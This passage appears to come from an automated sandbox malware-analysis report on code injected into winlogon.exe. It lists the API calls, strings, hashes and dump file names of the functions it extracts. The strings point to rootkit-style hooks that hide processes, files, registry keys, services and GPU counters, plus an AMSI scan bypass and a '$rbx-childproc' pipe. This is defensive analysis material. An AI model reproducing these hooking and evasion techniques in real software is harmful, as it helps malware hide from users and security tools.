Part of subcall function 000002E9917822A8: GetModuleHandleA.KERNEL32(?,?,?,000002E991781EB1), ref: 000002E9917822C0
Part of subcall function 000002E9917822A8: GetProcAddress.KERNEL32(?,?,?,000002E991781EB1), ref: 000002E9917822D1

CreateThread.KERNEL32 ref: 000002E991782043
TlsAlloc.KERNEL32 ref: 000002E991782049
TlsAlloc.KERNEL32 ref: 000002E991782055
TlsAlloc.KERNEL32 ref: 000002E991782061
TlsAlloc.KERNEL32 ref: 000002E99178206D
TlsAlloc.KERNEL32 ref: 000002E991782079
TlsAlloc.KERNEL32 ref: 000002E991782085

Strings

advapi32.dll, xrefs: 000002E991781F57, 000002E991781F78
amsi.dll, xrefs: 000002E991782019
NtQueryDirectoryFileEx, xrefs: 000002E991781EFC
NtQuerySystemInformation, xrefs: 000002E991781EA5
NtDeviceIoControlFile, xrefs: 000002E991781FB6
ntdll.dll, xrefs: 000002E991781E8D
NtEnumerateValueKey, xrefs: 000002E991781F36
NtQueryDirectoryFile, xrefs: 000002E991781EDF
pdh.dll, xrefs: 000002E991781FD7, 000002E991781FF8
EnumServiceGroupW, xrefs: 000002E991781F50
AmsiScanBuffer, xrefs: 000002E991782012
EnumServicesStatusExW, xrefs: 000002E991781F71, 000002E991781F92
NtEnumerateKey, xrefs: 000002E991781F19
PdhGetFormattedCounterArrayW, xrefs: 000002E991781FF1
NtResumeThread, xrefs: 000002E991781EC2
PdhGetRawCounterArrayW, xrefs: 000002E991781FD0
sechost.dll, xrefs: 000002E991781F99

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 97be40598d99cc7e2251af5994d86417916a17761c02b0069a8ae3958691b5c1
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 8451ADA4184ACBA5FB00EFABEC9D7D42720B740756F82455B941E02567DE3882DECFB0

Function 000002E9917512B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002E991751315
GetProcessHeap.KERNEL32 ref: 000002E991751323
HeapAlloc.KERNEL32 ref: 000002E991751334
RegEnumValueW.ADVAPI32 ref: 000002E991751393

Part of subcall function 000002E991751530: StrCmpIW.SHLWAPI ref: 000002E991751561

GetProcessHeap.KERNEL32 ref: 000002E9917513DB
HeapAlloc.KERNEL32 ref: 000002E9917513E9
GetProcessHeap.KERNEL32 ref: 000002E991751406
HeapFree.KERNEL32 ref: 000002E991751414
lstrlenW.KERNEL32 ref: 000002E99175141D
GetProcessHeap.KERNEL32 ref: 000002E99175142B
HeapAlloc.KERNEL32 ref: 000002E991751439
StrCpyW.SHLWAPI ref: 000002E99175145B
GetProcessHeap.KERNEL32 ref: 000002E991751472
HeapFree.KERNEL32 ref: 000002E991751480

Strings

d, xrefs: 000002E991751356

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: e0cbdeca4fa127c4fee59220e50efaa62b1f9ab6c743b42560bf565422515f9d
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: 5A514A72250B859AEB24CF62E84C35A77A1F788FD9F45412ADE4A47719EF3CC089CB11

Function 000002E9917812B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002E991781315
GetProcessHeap.KERNEL32 ref: 000002E991781323
HeapAlloc.KERNEL32 ref: 000002E991781334
RegEnumValueW.ADVAPI32 ref: 000002E991781393

Part of subcall function 000002E991781530: StrCmpIW.SHLWAPI ref: 000002E991781561

GetProcessHeap.KERNEL32 ref: 000002E9917813DB
HeapAlloc.KERNEL32 ref: 000002E9917813E9
GetProcessHeap.KERNEL32 ref: 000002E991781406
HeapFree.KERNEL32 ref: 000002E991781414
lstrlenW.KERNEL32 ref: 000002E99178141D
GetProcessHeap.KERNEL32 ref: 000002E99178142B
HeapAlloc.KERNEL32 ref: 000002E991781439
StrCpyW.SHLWAPI ref: 000002E99178145B
GetProcessHeap.KERNEL32 ref: 000002E991781472
HeapFree.KERNEL32 ref: 000002E991781480

Strings

d, xrefs: 000002E991781356

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: 9c6fbcc56ab669301fc2cb7a6bd420fd42f5d085b0e9173079ef8964857cb29e
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: 0C517D72240B959AE720CF66E84835A77A1F788F99F45412ADE4E07729EF3CC089CB10

Function 000002E99178EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,000002E99178F34A,?,?,00000000,000002E99178F2CD), ref: 000002E99178EFF5
GetLastError.KERNEL32(?,?,00000000,000002E99178F2CD), ref: 000002E99178F007
LoadLibraryExW.KERNEL32(?,?,00000000,000002E99178F2CD), ref: 000002E99178F049
VirtualProtect.KERNEL32 ref: 000002E99178F0A5
VirtualProtect.KERNEL32 ref: 000002E99178F0D6
FreeLibrary.KERNEL32(?,?,00000000,000002E99178F2CD), ref: 000002E99178F11A
GetProcAddress.KERNEL32(?,?,00000000,000002E99178F2CD), ref: 000002E99178F126

Strings

ext-ms-, xrefs: 000002E99178F02E
AppPolicyGetProcessTerminationMethod, xrefs: 000002E99178F157, 000002E99178F165
api-ms-, xrefs: 000002E99178F01B

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 7d66cee0f260e76ec70aa2cd8dcc72244016b7b75c0c0036f687b7c970e7b761
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: BA51D32178178651FA149B27E8883A52250BB49BB0F5A0B2B9E3D477D2DF38C486CB60

Function 000002E9917533A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000002E9917533FD
GetProcessHeap.KERNEL32 ref: 000002E991753412
HeapAlloc.KERNEL32 ref: 000002E991753420
PdhGetCounterInfoW.PDH ref: 000002E991753436
StrCmpW.SHLWAPI ref: 000002E99175344B

Part of subcall function 000002E991753950: StrCmpNW.SHLWAPI ref: 000002E991753972
Part of subcall function 000002E991753950: StrStrW.SHLWAPI ref: 000002E991753990
Part of subcall function 000002E991753950: StrToIntW.SHLWAPI ref: 000002E9917539B7

GetProcessHeap.KERNEL32 ref: 000002E991753488
HeapFree.KERNEL32 ref: 000002E991753496

Strings

\GPU Engine(*)\Running Time, xrefs: 000002E991753444

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 686f2a0a3ad37667bae304d8adfbfae6df89671fbb531ce467dde5e0e0c05cee
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 6F31C326740AC297F721CF13E80C769A7A0F788BD5F46452ADE4983636DF38C4968B60

Function 000002E9917833A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000002E9917833FD
GetProcessHeap.KERNEL32 ref: 000002E991783412
HeapAlloc.KERNEL32 ref: 000002E991783420
PdhGetCounterInfoW.PDH ref: 000002E991783436
StrCmpW.SHLWAPI ref: 000002E99178344B

Part of subcall function 000002E991783950: StrCmpNW.SHLWAPI ref: 000002E991783972
Part of subcall function 000002E991783950: StrStrW.SHLWAPI ref: 000002E991783990
Part of subcall function 000002E991783950: StrToIntW.SHLWAPI ref: 000002E9917839B7

GetProcessHeap.KERNEL32 ref: 000002E991783488
HeapFree.KERNEL32 ref: 000002E991783496

Strings

\GPU Engine(*)\Running Time, xrefs: 000002E991783444

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 6d877cb771b030e8c1848604b949f914fa886ad881ce973f6351e4596f79cd78
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: EA31F726740AD296F721CF1BE84C769A3A0F788BC5F46052FDE4D43626DF38C4958B60

Function 000002E9917534B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000002E991753516
GetProcessHeap.KERNEL32 ref: 000002E991753527
HeapAlloc.KERNEL32 ref: 000002E991753535
PdhGetCounterInfoW.PDH ref: 000002E99175354B
StrCmpW.SHLWAPI ref: 000002E991753560

Part of subcall function 000002E991753950: StrCmpNW.SHLWAPI ref: 000002E991753972
Part of subcall function 000002E991753950: StrStrW.SHLWAPI ref: 000002E991753990
Part of subcall function 000002E991753950: StrToIntW.SHLWAPI ref: 000002E9917539B7

GetProcessHeap.KERNEL32 ref: 000002E99175358D
HeapFree.KERNEL32 ref: 000002E99175359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 000002E991753559

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 2938c9b5367e3a30d3c493196a5ea509272ea85c73a4f5af7e66454cd259fcb7
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: DA314F31750B828AE754DF23E84C759A3A1B784FD9F56512A9E4A83736DF38C4858B20

Function 000002E9917834B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 000002E991783516
GetProcessHeap.KERNEL32 ref: 000002E991783527
HeapAlloc.KERNEL32 ref: 000002E991783535
PdhGetCounterInfoW.PDH ref: 000002E99178354B
StrCmpW.SHLWAPI ref: 000002E991783560

Part of subcall function 000002E991783950: StrCmpNW.SHLWAPI ref: 000002E991783972
Part of subcall function 000002E991783950: StrStrW.SHLWAPI ref: 000002E991783990
Part of subcall function 000002E991783950: StrToIntW.SHLWAPI ref: 000002E9917839B7

GetProcessHeap.KERNEL32 ref: 000002E99178358D
HeapFree.KERNEL32 ref: 000002E99178359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 000002E991783559

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: cc36a7bef3ff805c54552ed455780306df8aa7386e69bc5b06a84e5bafd0a384
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: 04316F21790B928AFB10DF27E88875A63A1B784F95F56412B9E4A43726DF38C485CA30

Function 000002E99172962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000002E991729689

Part of subcall function 000002E99172A544: __GetUnwindTryBlock.LIBCMT ref: 000002E99172A587
Part of subcall function 000002E99172A544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000002E99172A5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000002E991729761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000002E9917299AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000002E991729ABC

Strings

csm, xrefs: 000002E9917296A3
csm, xrefs: 000002E991729784
csm, xrefs: 000002E99172970A

Memory Dump Source

Source File: 00000029.00000003.2213692370.000002E991720000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002E991720000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_3_2e991720000_winlogon.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: 31dcd79f82258995a298855edb0e21b69cf79c23839cb83368602f13019457d8
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: 53D1C0326417D286EB20DF66D4883AD37A0F785798F19091BEE8957B9BDB34C1D2CB10

Function 000002E99175A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000002E99175A289

Part of subcall function 000002E99175B144: __GetUnwindTryBlock.LIBCMT ref: 000002E99175B187
Part of subcall function 000002E99175B144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000002E99175B1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000002E99175A361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000002E99175A5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000002E99175A6BC

Strings

csm, xrefs: 000002E99175A2A3
csm, xrefs: 000002E99175A30A
csm, xrefs: 000002E99175A384

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 45e1e8c4ca54d2253de5b2a904fd7511cf2d65945c76210a78027f5116f86b72
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: 41D1A2326447C28AEB60DF66D4483AD77A0F785788F12112AEE8957B97DB34C5C1CB20

Function 000002E99178A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000002E99178A289

Part of subcall function 000002E99178B144: __GetUnwindTryBlock.LIBCMT ref: 000002E99178B187
Part of subcall function 000002E99178B144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000002E99178B1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000002E99178A361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000002E99178A5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000002E99178A6BC

Strings

csm, xrefs: 000002E99178A384
csm, xrefs: 000002E99178A2A3
csm, xrefs: 000002E99178A30A

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 4e75c92e81f4563eef9d1b397e148fa82025b54b23607dab791906ef881fbefc
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: F4D18B326447C28AFB20DB66D4883AD77A0F785798F12115BEE8957B9BDB34C4D1CB20

Function 000002E99175104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002E9917510B1
RegEnumValueW.ADVAPI32 ref: 000002E991751117
GetProcessHeap.KERNEL32 ref: 000002E99175115A
HeapAlloc.KERNEL32 ref: 000002E991751168
GetProcessHeap.KERNEL32 ref: 000002E991751185
HeapFree.KERNEL32 ref: 000002E991751193

Strings

d, xrefs: 000002E9917510D6

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 2ef39016253745e3f5bde985a3b39585cad1a0ddd418d86485644daa4de0206e
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: A9417033214BC5DAE760CF62E44839E77A1F388B99F45812ADA8A47758DF38C485CB51

Function 000002E99178104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002E9917810B1
RegEnumValueW.ADVAPI32 ref: 000002E991781117
GetProcessHeap.KERNEL32 ref: 000002E99178115A
HeapAlloc.KERNEL32 ref: 000002E991781168
GetProcessHeap.KERNEL32 ref: 000002E991781185
HeapFree.KERNEL32 ref: 000002E991781193

Strings

d, xrefs: 000002E9917810D6

Memory Dump Source

Source File: 00000029.00000002.2704599908.000002E991781000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991780000, based on PE: true

Associated: 00000029.00000002.2703281095.000002E991780000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2706146390.000002E991795000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2707393773.000002E9917A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2708632529.000002E9917A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2709930310.000002E9917A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991780000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: abaf1c961283f1002ba49dcbb640215d6ad11cc3311b88137e00c21535f04237
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: FD417273654BC5DAE760CF22E44839E77A1F388B99F45812ADB8A07758DF38C489CB50

Function 000002E991752518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000002E99175252D
GetCurrentProcessId.KERNEL32 ref: 000002E991752537
CreateFileW.KERNEL32 ref: 000002E991752568
WriteFile.KERNEL32 ref: 000002E991752590
ReadFile.KERNEL32 ref: 000002E9917525AF
CloseHandle.KERNEL32 ref: 000002E9917525B8

Strings

\\.\pipe\$rbx-childproc, xrefs: 000002E991752549

Memory Dump Source

Source File: 00000029.00000002.2698054459.000002E991751000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002E991750000, based on PE: true

Associated: 00000029.00000002.2697359048.000002E991750000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2698955269.000002E991765000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2699728285.000002E991770000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2700589789.000002E991772000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2701874790.000002E991779000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_2e991750000_winlogon.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$rbx-childproc
API String ID: 166002920-1828357524
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: d68a32ee89cd1ef34b28f1b566192036f77d526cef49238af14684e985acd6d2
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
